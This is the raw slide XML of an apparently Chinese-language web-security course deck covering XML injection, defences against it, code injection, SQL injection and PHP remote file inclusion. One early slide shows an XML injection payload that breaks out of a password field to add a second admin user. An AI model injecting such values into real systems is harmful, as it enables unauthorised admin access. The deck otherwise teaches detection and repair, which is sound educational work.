              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" u="sng" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" u="sng" dirty="0"/>
              <a:t>&lt;/USER&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" u="sng" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" u="sng" dirty="0"/>
              <a:t>&lt;USER rule="admin"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" u="sng" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" u="sng" dirty="0"/>
              <a:t>&lt;name&gt;admin&lt;/name&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" u="sng" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" u="sng" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" u="sng" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" u="sng" dirty="0"/>
              <a:t>&gt;123456&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" u="sng" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" u="sng" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" u="sng" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" u="sng" dirty="0"/>
              <a:t>&lt;/USER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/USER&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;USER role="admin"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;name&gt;admin&lt;/name&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;1adtyr32e762t7te3&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/USER&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20448220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如何防御</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对用户输入进行检查</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>对特殊字符进行转码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>&amp; --&gt; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>amp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>--&gt; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>--&gt; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>--&gt; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>--&gt; &amp;#39;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205845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代码注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4768741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代码注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代码注入包含：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>远程文件包含漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本地文件包含漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>命令执行漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28225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什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入是一种</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用代码中的漏洞。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>黑客可以构造特殊请求，使</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用执行带有附加条件的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用户请求中带有参数的值，没有进行任何过滤</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用户请求中带有参数的值，没有进行任何转码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过特殊的请求，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用向数据库访问时会附带其它命令：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>任意查询命令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>创建数据库／表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>更新数据库／表内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>更改用户权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>删除数据／表／数据库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>执行系统命令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16490976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远程文件包含漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过本知识域，我们会：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>什么是远程文件包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程文件包含漏洞所用到的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程文件包含漏洞的利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>方式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程文件包含漏洞代码审计</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修复远程文件包含漏洞的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15109490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什么是远程文件包含漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>开发人员通常会把可重复使用的函数写到单个文件中，在使用某些函数时，直接调用此文件，而无须再次编写，这种调用文件的过程一般被称为包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的函数引入文件时，由于传入的文件名没有经过合理的校验，从而操作了预想之外的文件，导致意外的文件泄露甚至恶意的代码注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的配置选项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>allow_url_include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的话，则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>include/require</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>函数是可以加载远程文件的，这种漏洞被称为远程文件包含漏洞。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>常见的导致文件包含的函数如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>include()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>include_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>require()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
